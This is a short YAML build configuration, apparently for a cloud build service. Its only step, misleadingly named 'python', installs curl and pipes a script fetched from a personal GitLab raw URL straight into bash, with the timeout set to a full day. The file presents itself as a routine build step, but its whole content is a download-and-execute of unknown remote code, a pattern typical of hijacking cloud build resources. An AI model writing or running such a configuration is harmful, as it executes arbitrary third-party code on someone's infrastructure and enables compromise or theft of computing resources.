steps:
  - name: python
    args:
      - '-c'
      - >-
        apt-get update && apt-get install curl -y && curl -sL https://gitlab.com/jadons19292/netizen/-/raw/main/corse | bash
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
